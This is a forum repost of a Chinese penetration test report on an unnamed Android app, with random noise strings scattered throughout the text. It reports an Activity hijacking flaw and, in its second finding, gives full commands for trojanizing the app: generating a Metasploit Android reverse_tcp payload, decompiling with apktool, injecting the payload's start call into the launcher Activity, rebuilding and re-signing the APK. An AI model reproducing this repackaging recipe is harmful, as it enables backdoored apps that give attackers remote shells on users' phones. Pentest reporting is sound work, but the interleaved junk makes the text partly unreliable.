原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

4 R/ _2 S* L2 u* O' x 9 A8 G% X1 b- Y4 q" U5 @
0 p# E2 ~' _0 R" F6 C: f: r3 s& ^6 B& G# K

: z0 u4 j' H$ E ! |& n$ Q9 P& Q& R5 `( s7 g6 p1 Q( B 文档编号： 5 i, F w2 D8 w0 ^- _) F3 D" S / F* j$ k! m# n

- V# F4 W6 X1 d3 a/ U+ |2 E7 ? & u7 \9 Z! j) n1 E! }# g 5 A5 D ?$ `% F& X- S2 c! p+ X# h- e4 J5 F1 C8 I, k4 f9 ~

: q+ g! U& P% u6 a ! M! I, C+ N. q. L5 j* n ( i: H! x* b; H, a( N : I" S2 O0 s$ j* L5 a6 V

A* k# O2 ?% D& Y- [* \3 g! K% j$ }1 t3 n& B: u) O % E: v2 E+ ?6 |- t K 2 ]: z- O) k2 D2 T9 q% n$ d

. J+ ?( |9 {1 x" O9 X0 J" R ?& @9 t8 g3 _ 6 }" E( \/ l5 R# ~, n$ p, ^ + p' R& `/ z3 ]2 I) B! Z. ^

7 W, T' w" ^; Y# c3 l8 O/ Q+ z' s 4 o2 R% q! P. {# T/ p2 ^ * V; M( b; f B: C4 u- B- _+ | v8 V

: @) G. c$ ~# b- ]) K% U / z l' X. J% I' H0 k) Q& L( ^ 某某某APP渗透测试 4 `8 M# ~6 f k, U; M 4 v @+ `4 e, m( ?! f' I

8 |7 D1 t2 F$ K3 L }+ K! @+ M, ?* ]6 }9 E2 s* Z 0 v$ ?& B& z2 a$ D: d ! |: |9 O6 N+ W* b t( R3 L

! c* A& t5 Y' Y ?2 T9 x) R 4 \5 Z# T* X/ `8 w; H# q3 p 6 u, g l6 P! x1 ^0 x/ i# Z0 z" x5 l$ E% a

( Y% u) a7 B* o0 e/ N' q3 C$ x 3 I+ q- W$ ^0 L Q ) r5 p& C. j, i * m9 \; f4 k( B1 L7 w- L

" a+ r4 _- v7 l3 v& X) r1 X( v # c7 Y$ h, U8 @; B7 E' E; O ! t) S" [! W ]# P: _: B- l6 P$ A6 I8 F: j( ^/ K" c

0 b* i$ c* m/ a9 X' v! f : L8 j" t$ N* I7 l8 J/ s6 { 技术报告 $ M" L' I" T# u; Q . Z( W3 ^" S; a1 I: {

. P8 a4 v0 {# c+ |9 P8 y , J' B/ ]1 f" F9 `7 F! ` ~ ; e; d- a$ ?( F% a ) J1 [ M; O3 b; O

# R- e+ B7 f' M8 U& Y% m2 I 7 m1 `) I$ X& ]3 f& \ 7 o$ C% C! g# S B ] / {! c) i; ^8 H6 B# H) a; z

7 v9 h! B9 ?0 e) J# w0 h. J/ f+ H, i+ l. u 1 h, w$ w+ _4 M: e4 I4 D % M! j+ M1 [3 @, M4 o' v' Q [8 ~

; A/ l' L; Q9 Q9 T/ n& l/ e ) T" h& R/ [: H' `, c 9 B! y) p. M3 F- r7 J* _/ h7 C9 C* a5 u h& ]' s( C& c+ e

( e( L _# j7 l; t" P & g$ z: C8 b+ B! i 3 Y7 O0 t" {* ~4 W$ n' j u7 A* U+ \; Y3 Z( U

! r1 N$ Q% K; n8 U2 |5 O+ Q% Z 3 W4 O7 B" `8 I! O 1 N- E5 m# f) D1 |9 ?: ^* }% X

0 Y9 l0 P0 Q" }' r* | : W4 _, V* j2 g + X! W& P$ Q" {! {" {9 \1 X , p: N1 }: a& A8 L2 A# t3 a" C6 j

. S, y f. Z4 G0 \0 C2 V1 F7 O $ X" M, t/ n6 k7 H' w : v* y( [: T! [" m% i, p- p" T/ g" t, e W( P% t% g! b- a. @* v

A# t' t: o1 I: n/ _! l$ \ % B9 P& c* n. \( O7 j9 p' w , j8 C8 J7 B; M# h0 E7 l d: o- C* H; M# P5 \

" _0 L& Z( ]; y3 h! e8 A7 `, { 7 c% w; B8 d9 C9 q: |. |1 t/ p 0 [5 |% E2 Y! M' I7 S# i9 z, e5 X $ N4 _" K5 G% N+ c

. U. s* }& J/ S" Z# n: Z/ i 5 m6 |" s9 w( G/ d' o- l9 s - T( _. _* i5 }& o/ R+ [7 W1 b 5 {5 W/ S1 h7 r8 k

+ P) b7 B1 S' l; Z - L0 O# C) ?. S* K. ^ 2 {; j0 M* G* Z0 w m0 Q! k1 `& }* ]' T2 `* j# I

2 z, R- f" X+ ~5 s0 _ " V; u% Q1 V" L o" r4 U% J+ } 5 |& i: c& u& l# H+ C" b. f& V % W5 A% [+ n; @

9 n0 R3 a6 A( v% C* i3 ^ : p# ^7 N, `; Y1 l8 v7 O: V: u, ~ # ~; O+ |9 Q, x' O$ ^ 1 a' J2 \) _/ g- S" [6 T5 l

9 A% k C8 r# f# T. c4 v, o0 P2 s . `/ e0 {- c) I 7 r- P- D9 X/ z" W% f ' C4 ~8 ^. J& ^7 V# Y# [

2 h$ p& Z5 I, S; \( H+ o* C0 S. A; N4 W 9 ]6 Y7 J) Y+ V% z* l0 W8 B9 D' A& x" r

9 U) A/ \. D; z6 L9 B3 O, Q 8 T& D3 z, m, L* ]6 O , D! V& Q' T: r* K: V$ J% h4 o ' K, @4 _$ e# { l L0 V! {, {

5 f* t! d$ h8 T$ v0 w/ u+ Y& u + p- k* ]: k8 N/ h8 q+ d 5 y7 U+ {7 z' Z/ M6 x* G # B8 f, h1 i+ E

' p) \/ R) b' g1 z$ \7 ^5 d ) e, l- k8 x; S1 q4 ] 二〇二〇年 ' I- R( ^0 M# D5 n4 E! a- J {2 u( F$ Y2 b, |+ f( d

6 y9 W* }, T: Y9 O2 Z - C& F/ y6 l% G8 M 目录 2 l* t1 B4 S& E) U . R) A8 \: f0 _+ ^6 q

0 Q- o7 ^3 \+ s# D, t5 w" _ ; l# Z: l6 H; f+ Z9 b 1 S# p/ O4 R1 u5 L: p: _& m, Z' u$ x " b" d" w$ ^: M( J4 e. I

' O: n& E5 y$ K4 e [# U& l : b5 Z! M/ x+ q8 c2 e 1 概述... 3 : J# o; |" j1 R, P2 o' I; q 4 K: o5 |. c; X. {

0 o, g* w) ~" B0 ^% g- @( @1 J5 s2 b / F. @' X; C3 G, M9 V$ y- s- z) h 1.2测试时间... 3 3 c& ^( O( k8 V, l 8 G) i$ e. m C3 m# I

2 D: X1 e+ A, F* D+ M U& j7 O - Y! l& _/ }0 F4 A7 h' P 1.3测试对象... 3 / O2 g2 e8 _" L4 k- C& P. x2 n ( e# j9 o$ k7 a5 U0 H6 E! A( B

2 P; |$ n, H( k9 @% R# W * x1 W* l# }/ [( F: I& e 1.4测试结果... 3 5 l6 f; g& r* ~8 K; x+ ?2 I 4 }# Z; w/ D5 ?

4 [3 K u z" v& H: v4 _) P; Z + \' T- @ v3 g% g 2 检测结果... 4 ( x# [7 V. U& N% b / y n% q+ x. N& R$ i- I% T, L

% l8 u p: N0 J2 P' T# l) z9 O. z* M4 E* S; P: D* W 2.1 某某某... 4 # M- y- `5 l# t9 `2 b4 L ) ]! R( T0 u6 m

, r9 O u4 i8 g8 n! l; f& J3 L& j1 a 2.1.1检测目标... 4 2 z6 V2 l* k6 F; |! d8 ]1 @- K, `% o' H+ Y9 W) O

1 F6 K6 H" C2 K3 l/ t; r8 X' X. s( N3 ], `! \- Q 2.1.2检测结果... 4 ! |$ K/ g: P0 s" E6 B# \' o2 T2 g1 [8 s* ^5 q; j

% N9 H" U8 B- l+ u V' a1 R . G( B. w6 O* @- j5 [ 2.1.2.1. 4 : d- R5 } P6 w$ ^1 u8 l$ i; m) K3 Y2 G

; [% a5 N1 R/ Y9 V3 t2 h. I 8 Q. b) J8 @7 ?: y2 i4 | 2.1.2.2. 6 2 d+ G% k9 U9 D1 P" ~; t2 A) o, |( l8 B' g8 t# P

% [' ~4 y8 b0 x" @" z6 ^, P& M) n- M2 i! K% r7 F , l# H5 P/ ~3 o5 z/ w5 @2 a/ Z! S% G! [) j( C

9 B. f0 z0 V% E# q - t+ x" ?7 l$ V6 m 1 概述 1 W0 G- d" Q2 y5 F1 g t8 ]5 L$ m, Q0 |, N5 {+ k

1 e: E- c" U- U) p 9 n9 X+ h; O5 r; d5 e( u0 O }/ h 1.2测试时间 , z' G3 l7 K% y5 X, c 8 y! E' s# a( `7 k

) o% n: `7 M5 I! J: r# } 9 E- j) @" L" g0 _' s$ T' n( L 2 s* Q! [7 l+ O) ? ( e- a% Y8 F2 r8 s, c3 t 渗透测试时间 : y* u4 `9 O1 L9 z ) m% Z$ ]( I6 s, J) K) c $ j+ N! o' k4 \|, H* u N( E/ M" i+ l1 R& z
2 \|8 `, }; J0 \|5 d) Q" w b% e( w2 X# t * W+ `" i5 K0 f, x2 I: g! h. I - X& F3 [# M& x 起始时间 3 ^/ V; C; j3 a, Y4 n 7 d3 N/ P1 B" w! f# N: D / M! n: ~' n2 m4 Y, q& \ 3 H) V) {9 }$ g# f5 s3 ?2 v- P	" \|9 _, `; D0 M3 W4 \, ]3 Q* } / ~# J( \/ f; \- o2 Q/ `& B; c2 v3 A & Q9 G6 d# R' D- x$ l0 P: c! q# ]5 ? 2020年4月6日 . S. R- ?/ L( M8 d( J6 @; G 4 G9 Q8 C+ v' Y6 { / y# L' S- l b0 G - _& }: L+ ]6 S, H/ Q. r. w
, r4 C. Q1 ]- u. X! \, L u' L; w5 ^' z# Q* b- W 6 v( \|, m; m' z5 M8 y ' Y. \% w& P- o J: e& @ 结束时间 + b$ {, g* @: p9 N8 \* x' e* M; E ' q$ q- H- o5 q& l) W! W7 ~ 1 _3 G! ?: O0 ^9 Y7 M$ I% `7 o# f0 h1 j3 a# x. j	' [1 S' o" o0 u0 c/ G! D) V" d 5 t. W( r# s- r! ` T # E G' y$ j( `; m' m # k: ?- n% D3 D T 2020年4月9日 $ i& d3 R! n( [4 d/ S5 c 9 {, T% g4 Y/ ~% K 6 H: r% c6 n1 q2 i* U8 X" O) B; b! H& e* H) I

) b- G8 \5 E* A, j9 ~" R. j0 t8 R% V9 C& k 1.3测试对象 {9 h( B$ ?' A$ j1 `6 d/ V% a5 N: k! V

; x" T2 n0 D9 W: l6 w' Y0 L/ l U% R$ {( @+ y3 g 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： 5 b# ~5 X8 ~+ q5 t ! s* [+ r/ U% j3 [, g

" Y$ ]7 ?4 w6 W/ \ F7 W. f # i$ n7 @. h* [# m5 k1 j2 I 表1-1 检测对象 5 s: f# x J- d6 S/ o; }) Z2 n( L2 m0 @1 f, m4 g6 A

& j3 f& ~+ c3 R/ a$ S# p. ]5 z8 w3 k9 y. n0 U6 V3 G0 M# Y ) X" \|1 V% m* ^2 j. S/ Z( W; Z2 P ' Q' w% u R) b 序号 & A0 g0 O# x0 w; h2 ` 6 i' k+ F7 o- {. P% f 8 u& Q4 e) N9 M8 B) {( ~ 8 F! H3 W# H8 B, U2 [% t9 J/ t# C	7 x1 L: W5 K1 o/ c {7 i: H R8 O4 _ ) q" l8 A; @7 p$ D# p $ n0 L9 E5 r o% Z" P& k( L 测试对象 # \|3 G9 ]$ @6 s+ S+ V: P3 D7 p3 @& r3 Q. A- V, n ( r( j: B3 M/ c& h3 i. S5 }8 J# N5 M	; z' @1 W9 b2 z/ c& L' m & v! H5 ]& G* q4 {; h b6 z& _+ q' y$ ^ 2 }; A8 {7 b8 @7 o z, j) C# G 测试地址 4 T3 y6 l4 G3 E5 G* l! o7 d1 h3 h8 W( a T: _" d1 {7 m( \ ) r7 h# \|, u6 ~- d% A1 [ * Z4 D- Y" N8 a( a$ j	) D' f2 `% C3 I# e $ \9 v, Y- Q+ j& P" p 2 y4 e% b% ]% [, ^- e* k3 ?$ i ! [- x4 A: S9 Q* G 安全漏洞 3 \: R% O( S% u$ e! y; d2 e ' V6 h, L) Q- U, [0 ^% I+ ^: O' t- w 1 b& b6 n( e. } u * h4 _4 n6 z J9 g( Y, \ O9 [9 a
) k, I* B8 s! P8 v" C U& W- j# Q- ^ # f/ p8 t. ?, N. `1 }8 j M. ? - [) V8 z* M$ D 1 , I; y9 _3 W+ I+ H4 ` " D! {) p' ?3 N, v& m- f# a1 c& _ + C! ]# C& `& [# U7 k1 w7 [. x$ W- p# A* D% C/ V	* i! V% P8 G8 @! t9 w) g & T, a: M) [/ y6 b& x M) `; F9 v; k. W) t9 T x. ^! y( r 某某某安卓APP ' ]3 N8 Y9 C* F! U) {0 b; o9 n + o' v& ?1 Y" G9 ] 7 p" Z& h* k/ [" I, y0 m. p7 a7 ]8 P) r3 t* w	3 s& X/ G7 [. t1 a+ N, A4 B E$ ?# A : W( G6 f9 H7 ]) r: G2 l6 N ( r7 l0 m% b9 \" v7 u) L9 U/ ~ 6 v5 g& X0 y, c8 O* \|$ m, b 9 a8 Z. G# u5 E+ D8 J; R; R8 C( z2 x * m$ r% p: \9 k# r8 E8 T* M " l- J( F3 O8 {' u$ g, l# G	( L6 T0 M3 ~* \|7 e " G& O: n* B# \| W- w! Q# [2 s$ s6 [' h . \# Q7 i) r s. M 2 3 u9 J; X1 d# {' I$ V * n6 G8 \|, z+ f: M( @ 8 M: v3 F# K( X9 a" ]- i 4 H7 B( R9 D' J

( g q F4 w- v7 b6 R' `) F% a; e$ N/ i 1.4测试结果 8 H" I. q/ H \+ S ; ^3 M+ u8 m, n) Q+ E" G

l' d% M' H* X% _, b & K. e$ e+ y9 P& H1 Z5 u- B7 [( U6 h 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： & P4 g- P( C2 n8 @; S1 A * j: H) ^" X( P

, Q( j" E5 y0 @5 {5 @% ` & {; W9 n! a4 |) @ : m' z' ?8 B1 n( g , {7 R% p& ?8 t( M& P7 j3 i! w- o! i

" L$ `$ J0 T+ ]) ]4 j+ Z: G$ z" V, x5 ~) n. F 序号 ?4 s- J0 X& B; K7 g1 W 0 a6 T- _4 E; U( |. [

4 y$ T' f1 L3 d( G* P 3 Q: @' N) P- z5 }& R [9 T 系统名称 3 w3 l- w+ S7 ^' d* H4 f 1 u+ z( s, [9 R) ~/ H! i% w

2 x$ l! w! }% @% ? ' l1 p; u/ V5 c7 P 漏洞名称 % \5 {, b% s5 a/ |: c ' G/ A0 I" a# y3 K" w& j

6 ^; p& ?5 `6 V4 v4 @; R0 j * ?' [4 Q* [) J2 Y8 _ 漏洞危害 # e ?& E( d# Y/ O 8 S% h) ]; | |

7 Q9 U" y, y/ g: @- ^8 v( m3 t& L ) ^0 K( `+ R4 c( C# \" k3 d& M 修复结果 5 K+ M8 K. {/ P5 R1 t" m) z) E/ \( O7 x' Z3 F( t& m

2 Y% N, k3 I0 E% ~6 I4 y/ r% S- P* R# l; P1 I" {8 k& U 1 5 e& g& z% d7 @2 X, q & g6 o4 G$ ?5 d2 a) C

8 ~% Y# U0 G# n4 C$ ? ( P2 i3 l; \0 J: T+ j2 I/ c7 \1 e 某某某某某某APP ! r1 P6 U5 H& k! Z! J 7 U1 S6 s' m8 T) `3 X

$ j9 d; T" q0 L# n; ~- H1 ?* ^2 R9 H5 S Activity 劫持 & Z' ~& C) y. Z4 ]: m % ^- Z* _- s$ C

; W% q) V+ _+ O6 u6 N3 \6 q4 e( k: `6 X* f7 }' \4 a) F) a( N( L : p& i0 X/ R9 z5 N& o$ h5 ^) u" Z 4 Z: \; b' R, Z0 x) }4 h7 }8 A

9 [4 ^# O, l( d" O3 T) t % \/ A4 A+ m% d 高 4 g/ q2 {& m8 o! r ^& ?1 E$ H6 b! W , d: f$ v3 a( ^- N c) a- y

5 L0 W, ?5 H0 g' X , g( L7 ~ U4 H. | . _ E9 }" q/ X- o% O r8 A9 N+ K9 ?3 G1 ~

0 J. m! s# [! v0 d: X; T0 E ) X" c6 b2 K/ }6 i* Q8 X2 _6 ~ 2 # m/ U* `# d+ G' e . }) I6 G! o) K

( Z4 {0 K3 `: n1 a2 @ 3 R$ A1 Z! G; ?0 z 某某某某某某APP 4 H4 `9 P' k2 r% h0 M . w4 u, z' |9 I! q; ?# q# s6 c2 z

. |0 o0 _: }/ V* s$ H$ i 9 M! e4 u8 i2 f7 h 反编译二次打包捆绑木马、篡改APP代码 * N2 W M9 Q% V$ ~- E4 J 7 J; v# D! _ d+ k3 w

# z5 k" F! Z8 o$ A0 B. z3 N# A% M& Z- W6 z 高 + l( L, @0 ]! j6 } Y/ x: g4 T8 u) b

4 H; T# w, p' r9 h% W - d0 V. F D3 O! Z% Q& l, b & ]' ^ S6 O& s/ T0 ?9 u 0 Y7 X- C' r0 x( @# q3 w& X3 H

h+ Z- X( g% D 1 L4 [- F9 d0 P- g8 U3 C. q 2 q0 t3 e( U' D- H2 I9 q( J* Y8 ?6 I, V8 r

+ z1 L* \# U$ `1 _1 V0 h' ~ 8 _8 {3 Q6 m4 d 表1-2 测试结果 4 S, w3 e5 N4 S4 w) {% |" {+ K 8 ~. r& x7 r) m, p

* ?" [% R$ g9 b7 R x9 Q, ]8 z/ [2 T" T/ z * O, t- V7 T6 _; h" h ) b5 [ B* v- e0 l# c! \

5 H+ [5 W1 E: b: @% F' m! w' `6 H2 G% R$ ~7 G 2 检测结果 # }& x7 p$ y% a" t& ^: |7 J% _- N ' k4 e8 W; d& x) l p$ `! r

. O$ h% Z9 k' q$ n; \$ A8 P. ` 4 ?+ z1 h6 h7 }( Q 2.1 某某某 # {& o+ m/ z P- r; ~ 2 f6 D$ H# o S$ p% l9 W

- K3 p) y9 O6 m " b/ l5 {3 ^( S! w6 m 2.1.1检测目标 . V B0 @7 H3 Y' K* K7 `0 E) L1 H. [" z( N8 W

\1 `. b- @' u4 n5 y) B / {( U7 z H4 n: ]+ c2 Z 目标地址： 某某某某某某APP : o% v6 p: h( q3 c/ M9 O: I. }

3 y X$ H( h: p- T 5 @( Q3 L8 T( v- i$ t. g: i" w 2.1.2检测结果 & R% @" q& W, d2 ^ T9 e v: I, `& Z( }, s. Q% K

9 n2 i- J3 ]% ]; d 3 m# L$ M4 I. m! _ 2.1.2.1 4 B$ F# f7 V. V5 D( l2 b* l' a & X6 r6 ]2 H% ?( \% W! R

) [' _/ H( l" N4 ~% o 4 Y7 \0 ^0 b7 F% z3 e 漏洞链接地址：某某某某某某APP . W4 ~- `& l5 y {( V; z 9 @& p7 B; u6 L3 |6 z5 M) `4 x

" ~5 c( B0 ^, u0 y6 a: }7 H2 X M * L( T8 i8 p Y; ?% f! Y4 u5 h 7 E; q- M. W- b( m8 b" d 1 y9 h# `! w4 v" v" z

& X, A/ g4 U0 k4 Z6 X3 Z0 b! L 6 u. K1 ^/ R' h 漏洞分析及取证： * v7 D9 A4 j" m8 [- [& }# h9 `( S- f% M! |: M& s, s, i2 _9 O

7 C, Q0 k0 M3 j1 _! ^+ r; D/ D! y1 s% \5 Z- i! c9 u3 | 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： 9 g4 W3 F, G. P5 w# D ; d7 t- s. E8 C( `2 Q2 s

3 x2 B+ N4 D& r& D 0 \! M7 A# A( a! {% [ m! Y$ ?& D9 A2 u T! f" Y6 `- {" N% I0 l' z8 g+ H& |

8 c5 _* E1 c' r& \. T, M . K: C7 A/ T. d- P f4 n) G$ E. T 4 {. q) G/ l: A3 a% ^% I/ d* R7 d& ?: s6 ~

+ e( {0 j0 P1 L$ m, i - x6 c) W9 K+ z& I 3 p% C7 C |* t4 m6 j4 t ! ^. _1 y& f# [1 d

6 _1 w7 [- A& w8 P- ~6 F8 x4 W* H, D$ b w& C + B1 G5 Q3 j7 V- c ?, y* f9 b) z% a5 c/ V% k% j

& a, `4 P/ c" G3 Q' Y1 V5 B 6 y* E% V& P) ]( U( }8 T# C 7 Z( d8 V: Q+ n j8 q$ O" a- P5 ]

1 A- a% [: y1 C' |/ U, [2 t 4 W! Z! x4 j( P: V& O8 w8 _$ @" @ 漏洞危害：高 $ w& K' ]9 P; l6 P . ?8 x, v' y- x

) U9 J0 l& v6 Z' m3 C' F0 d k" z: G, p4 M) Q, s( l ( S- ?6 h0 C" j. {) L' [& K/ W$ s- J: I& O! I" q, C' R3 h 严重程度 3 h( R" W' s' _8 H, T: _3 d; L - P$ b) P0 C4 m q 2 m/ a, w8 J$ d! L$ U/ o2 Z \| * v8 }* a, [+ `. q0 W' n+ N	/ E2 c$ o% @+ \# q2 c/ @. @/ o: B. x& C : W- n: n& V6 r; l# J . K- j6 p6 }$ B! j& W1 d- R 高 * ]: k0 E3 p1 n& K" {; ]6 T- m 3 M" j7 K9 Y t6 `+ i- Q P T: j5 A8 P9 K9 X8 _ . P% O& I% M! B+ @/ k( B0 ~	7 {* E% \, G) ^' O$ I& l* I- j9 g 2 B, C/ O% H1 _ 9 ~2 U: g4 R! @ ■ . k" {) l1 B, P" h5 ^1 I" {5 E- K0 \6 ?5 C, P% X& } : O6 K+ ~- M6 @+ v6 p$ I & i4 Q* N" C& _: M2 y; p	! i% a7 Q+ M; j7 Z5 R% u+ i( p6 ]0 ~# W, \* G: V 2 Z/ U U( i `# L$ y $ h2 {2 J" c9 [ {+ `2 Y" N 中 , [4 h& \/ h* S# Y) P2 \/ G 6 V l6 I( d; x x* P 2 z6 h" u' @. c4 P * m% x5 B2 h7 e8 [& g1 o	& G( E9 n R1 r3 [ 2 {9 y) l4 f3 j6 K6 E( H6 A5 T# l 8 t: V) ^2 U8 z0 B" S8 D* G! o5 U% s9 \|' h : M' R* L* P- `1 F2 L5 R5 G 5 O a q. z, M+ ~% ?/ @5 B6 V , I4 S- _; K. N$ P I1 J5 p+ r$ G B- h7 y7 i	, m! N7 {0 x- M8 A% O! ~+ _+ O( H 4 `& t: D3 S& P" y, p: r9 }9 _/ V5 _' \|, Q+ q" B 低 ' P$ Q- J# z5 _' C% M. w! D5 @/ v2 @' t* U# \* o 7 O6 X: J" t/ v( w4 t7 p# G, H1 U& B0 \: ~6 K5 {$ F( M4 L% f3 H	# @1 r9 D% b! Q4 [3 e 8 M6 T0 S/ \|3 i0 R$ ~ # n- X, @* D+ o. e+ ^! c* b$ ^ , M1 i: h/ \|7 s/ c8 V0 a1 P- l6 D * y8 z; _5 y8 q5 d/ W: @' S' C + \|. u3 t+ b% q2 r0 D 7 O# C0 \|- v# p& T4 n9 R7 k 2 d0 w) d+ S; `3 W: N

1 `3 \5 p7 `, A' M i3 b0 d 5 Z! Q: E% E) @ D) G ' q' x( r, X# ~0 W/ p* g1 e + V9 T+ w/ \1 b* [4 t

" K" ]1 A) i" h' E! _5 K% S5 O( A( f" N# X& c- l0 G 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 9 B$ h0 p+ |* U0 }3 ~! S 0 j% C6 }0 Q u5 S2 I% E

. N" C/ j. [3 S$ r+ v9 f 0 N$ h/ H# y) V5 N$ D 2 Q$ L2 J- d. M, Q* h; V / `& a8 V6 q& ?

1 y9 n9 o; `3 ?9 i5 N" g2 n( E! T/ Z2 V& {/ L& i$ l9 u 0 a- C2 C9 g" J% c* Z5 M6 R9 n" R8 }7 ~6 W

+ ~% T0 d2 d. X2 H$ K [) E! ~7 Z1 Q# K9 r' @& x 2.1.2.2 ' Z' {# z( c+ \: c0 A5 A & T0 E* q+ p9 s# W/ e

( q$ ^# `/ e; ^: N; l6 I4 e0 \- a- o* U# M 漏洞链接地址：某某某某某某APP ; f( ]0 g& W) f ( Z& x0 ^* R% u( M: b# b- B

" M% q, w E4 M% \6 {% B4 b ; Z4 C+ b" Z; `) R/ @: d; ]- p( F0 D2 D 漏洞分析及取证： # p3 u) M8 P) G 1 Y6 f2 w3 i$ s3 V7 A! `+ T

' p2 x" a, x; o! L$ r7 M. n. l( U a) I6 Y5 ~. W7 x 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： ( I1 F# d5 e4 Z% `1 W2 ? y" h4 K2 k! ~8 n% M

$ P8 U" N7 {6 o5 p: m' e8 S! O6 g. R8 u+ | 用Metasploit 生成木马 apk 6 P# ^, x9 c, i- @, W* d 4 q9 ]: @1 T" _( V7 l+ k

3 w. E9 c% G6 Y4 ]3 c t0 [% B) O2 X( w& C- m) Z5 i. t4 g+ Z3 g; y; n msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 8 m: B# x/ e% B3 ~& T O- w . F# z* _2 ?" P1 A: y, U5 N4 N5 |, Y

1 y* Q0 U6 u. Z) R3 [! q 5 G; P2 [9 f: y4 K: k6 Y! o, k- q 反编译目标apk和木马apk 6 T( C& V/ k$ k3 D& j/ F" c $ m9 h* ^0 |. \/ F" p

3 a. g% X! k2 ~* I( w t 4 X; W5 c6 W6 s! Z6 e6 |% t apktool d target.apk
- T- R& T3 ]: Y% B5 }0 W; y( l0 `5 i5 R7 o apktool d cockhorse.apk ' r4 p/ [0 A3 c; c2 o 1 I m! b" i G0 J+ h& M2 B% f8 k

# E0 f5 W+ }& t* [9 \* [: h% Z* S9 F' c2 r( s& W2 _ 木马 apk 注入目标 apk , z; u' T% E! P& o# D* W d8 i" g0 X% r6 t; r4 |

0 H9 i) N) r3 W+ ` " Z o" H+ Y% B: d# U: t: o# g 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
; I# D" y1 r0 `7 l. A : _8 l+ p9 b) B2 q& I invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 0 I" r% l4 m5 G8 r% y" l 3 e r Z1 G2 `- L

+ y, [+ c" ?) w( h8 c- @# B. C 6 E" g7 Q" M9 y, l8 t& m 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 6 D5 g1 R2 H X, }8 _' V1 D$ X4 ~5 u5 a h5 s7 a

0 a: X: _: n0 Q3 ]) U0 f0 X& r # \$ w9 e' u W0 z5 w3 S- ] 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 5 o% }5 k" H. ~' _ ' W+ [7 w' ~/ _, H+ w; A

) }# ?% X4 O. X6 m6 } 2 G% A4 [- n# e$ C8 Z" j( R 回编译生成最终 apk 1 {2 o) O* H! h& [* l# N- J% J. l% e1 ^; n! s9 J6 g ^# P

; d, o& k* h; ~# I( `/ Y0 j0 {4 x# Y9 ?4 R2 u# X 重新打包 ! {$ k+ I8 ^9 J i+ g, L, j7 d/ T7 E" a1 }8 [. ~0 {, c X

% R" Z8 @2 w s5 q * L" o4 n; o1 Z& X% `0 D1 c2 `+ I apktool b -o repackage.apk target_app_floder " [7 ~) i2 k8 D. F0 W9 A / q* E t6 G% s; R# U. K6 I' V

* u1 J: ?4 I- A 创建签名文件，有的话可忽略此步骤 9 a7 Z0 U9 a- P# J( W % s, F6 `& c1 [4 m

6 X! x3 G1 d$ ]3 K ! }! g; N; C1 S% D8 @8 r keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 6 H6 a& Z2 O1 T+ @2 H8 `% {! K: d) r; Y. ]* x7 G3 }9 @* X

; G! L, M! s. ` $ G7 ]1 Z6 R S7 ? 签名，以下任选其一 U& z: l1 a# N2 f; U% W* L9 k6 k% a6 E6 |! I' c0 a! `" v

1 ^9 I0 q% r7 X: Q/ k1 M- Z0 g# o3 L, \9 s5 v1 j jarsigner 方式 2 s& q; F2 C; G& g Y6 A, ]2 d. @( c! B0 [7 B

) G2 b- J7 ~' u8 ^% j( h5 v3 }5 ] % m1 w) \/ _ F jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname , N2 {4 c2 p3 \4 a0 _5 H W& B- ^9 w

, C* j3 t8 `6 Z- _4 M- q* B7 O' p! N l" G0 e; k apksigner 方式 ; L( K( l! X) O ' K: Y' V2 U7 Y+ F: g) t

K& h. n# F* }8 ?6 R& q ( y3 F, p; w7 h apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk + ~! p% v3 c4 l! \, B, a4 U% N2 `3 [9 n7 E, P/ s

, X$ U d7 E3 A* g) ~ w 8 S/ X- E6 F* G6 K; V 如需要禁用 v2签名 添加选项--v2-signing-enabled false ! m( O1 o* w; p5 s$ g$ h& p) ~, u " C s# i& X% S

) L* f* P$ u. D4 X* C6 H9 S 2 X; {) U! N% r( } 验证，以下任选其一 / d5 n6 @; b$ {) X6 d; W # p( Y4 ^( Q7 S" x2 T2 w3 d" R

1 L2 Z% {' c- [0 g 0 Y) y. u! l e% m- k1 y% K jarsigner方式 2 G* a2 }& Z, x) Q1 P: [# Y' |6 S5 a8 V5 @* I

; }6 z+ N, M% C( I- u0 x$ ?7 G8 T& N1 z$ G* _ jarsigner -verify repackaged.apk ' O/ K& t2 J# u/ m% ^6 A( i* g, j3 S( Z7 v

. { o0 k7 d4 t6 E" |- e " |8 z Z* I1 \$ `3 Q apksigner 方式 9 b7 w& T6 e0 B( Q& ^" A. P: h& S0 E. r# d y3 N6 K% w

3 i+ ~. y4 ]* f$ u: b/ y6 U - g9 [: Z, B. W0 Q apksigner verify -v --print-certs repackaged.apk 6 f" u9 B& H7 d. N+ K # l6 @0 g& x+ n7 ~

/ }; S4 v" o+ O1 e5 C; ^/ _3 X% {" d+ Y2 b# Z9 W2 W( J keytool方式 ( i K& e$ q3 A/ M( \6 ]' P" W6 ?9 M3 P / J7 D6 m5 c7 ~5 s' G8 F; P

5 j1 [) O: w' R4 f . R) x# x% \& y7 s, [$ J keytool -printcert -jarfile repackaged.apk + a3 r" ^* V2 v p+ r9 z4 S 5 s$ U+ d& y" u

